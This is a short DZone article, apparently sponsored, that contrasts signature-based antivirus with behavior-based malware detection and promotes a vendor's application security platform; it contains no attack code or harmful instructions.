Over a million developers have joined DZone.

The Early Bird Gets the Virus

DZone's Guide to

The Early Bird Gets the Virus

Often times, reactionary security procedures are not enough to protect your systems from malware. Read on to get a quick look at how to improve your proactive security.

· Security Zone ·
Free Resource

Discover how to provide active runtime protection for your web applications from known and unknown vulnerabilities including Remote Code Execution Attacks.

Most people have heard of the proverb, "The early bird gets the worm." The part that many haven't heard is the followup, "But the second mouse gets the cheese." The latter proverb makes a lot of sense when you apply it to the current state of virus and malware detection.

Today, most established virus and malware detection services use a signature-based method. This means that they leverage lists of known malware signatures to scan files for threats. This works well when protecting against known malware. However, as with the mice in the proverb above, someone has to spring the trap to make the cheese obtainable. When enterprises use these solutions, they must simply hope that other organizations encounter new malware first. That way, lists of dangerous signatures can be updated.

An additional problem with these tools rests with the strictness of their signature matching. This is because they search for highly specific hashes (patterns) generated from the contents of known malicious files. Unfortunately, it is extremely easy to create new variants with new signatures by changing even minor aspects of attacks. In other words, even a small edit to a file containing a threat can alter the signature enough so that it will go undetected by signature-based tools. This results in the signature-based method always being reactionary and a second too slow.

More and more, organizations are turning to behavior-based anti-malware solutions. The advantage of these advanced detection methods is that they don't require a sacrificial lamb (mouse) to figure out that a certain file is dangerous. Instead, they scrutinize large numbers of file characteristics and behaviors in order to identify threats. In addition, due to the fact that they don't depend on signatures for detection, they cannot be fooled as easily by altered variants of existing malware. This leads to a simple conclusion. When implemented and utilized effectively, a zero-day solution should make any early bird, mouse, or human feel safe.

Find out how Waratek’s award-winning application security platform can improve the security of your new and legacy applications and platforms with no false positives, code changes or slowing your application.

security ,malware detection ,vulnerabilities ,malware

Published at DZone with permission of

Opinions expressed by DZone contributors are their own.

{{ parent.title || parent.header.title}}

{{ parent.tldr }}

{{ parent.urlSource.name }}